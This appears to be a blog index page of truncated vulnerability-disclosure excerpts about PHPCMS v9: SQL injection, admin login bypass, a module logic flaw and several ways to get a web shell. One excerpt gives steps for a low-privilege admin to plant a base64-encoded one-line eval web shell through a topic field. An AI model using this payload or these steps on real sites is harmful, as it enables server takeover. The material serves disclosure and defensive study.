• phpcmsV9.6 getshell

    phpcmsV9.6 getshell
    这个漏洞来自乌云,经过本地环境测试后,发现漏洞确实存在。 详细说明: PHP双字节编码,这个本不应该出现的问题,或许因为过去太久远快被遗忘了,phpcms从20140929的v9.5.9版本起,增加了mysqli的支持,因为编写疏忽,导致该问题又重现江湖。漏洞本身无需细说。phpcms默认使用mysqli数据库,显示mysql语句错误(debug为true,呵呵完全可以爆错注入),而且安装过程不能修改。 漏洞影响:...阅读全文
    作者:unhonker | 分类:漏洞公布 | 阅读:7,039次 | 标签:
  • PHPCMS后台低权限拿webSHELL

    PHPCMS后台低权限拿webSHELL
    PHPCMS程序版本:Phpcms V9.5.6 Release 20140522 过程 1. 添加专题 专题名称:test 专题横幅:/1.jpg 专题缩略图:/1.jpg 专题导读: <?php file_put_contents('0.php',base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWzVdKTs/Pg==')); ?> 生成静态:是 专题生成目录:test000 专题子分类:test test 其他默认 -> 提交 2. 再次添加专题 专题名称:test1 专题横幅:/1.jpg 专题缩略图:/1.j...阅读全文
    作者:unhonker | 分类:漏洞公布 | 阅读:12,665次 | 标签:
  • phpcmsv9后台登录绕过

    phpcmsv9后台登录绕过
    (在注入出的hash无法破解的情况下) phpcmsv9在数据库中存储着session <?php return array( //网站路径 'web_path' => '/phpcms/install_package/', //Session配置 'session_storage' => 'mysql', 'session_ttl' => 1800, 'session_savepath' => CACHE_PATH.'sessions/', 'session_n' => 0, //Cookie配置 'cookie_domain' => '', //Cookie 作用域 'cookie_path' =>...阅读全文
    作者:unhonker | 分类:漏洞公布 | 阅读:11,002次 | 标签:,
  • phpcms_v9.3.2某管理模块逻辑校验漏洞

    phpcms_v9.3.2某管理模块逻辑校验漏洞
    在文件modulessmssms.php中: class sms extends admin { function __construct() { $this->log_db = pc_base::load_model('sms_report_model'); $this->module_db = pc_base::load_model('module_model'); $this->member_db = pc_base::load_model('member_model'); //获取短信平台配置信息 $siteid = get_siteid(); $this->sms_setting_arr = getcache('sm...阅读全文
    作者:unhonker | 分类:漏洞公布 | 阅读:3,927次 | 标签:
  • PHPCMS v9 注入和getwebshell

    PHPCMS v9 注入和getwebshell
    0x00 前言 0x01 新年左右的注入 0x02 绕过厂商的补丁 0x03 破不开的密码 0x04 曾经的 getwebshell 0x05 补漏了 apache 0x06 Exploit 编写 0x07 结束语 0x00 前言 PHPCMS V9(后面简称 V9)采用 PHP5+MYSQL 做为技术基础进行开发。V9 采用 OOP(面向对象) 方式进行基础运行框架搭建。模块化开发方式做为功能开发形式。框架易于功能扩展,代码维护,优秀的 二次开发能力,可满足所有网站的应...阅读全文
    作者:unhonker | 分类:漏洞公布 | 阅读:8,588次 | 标签: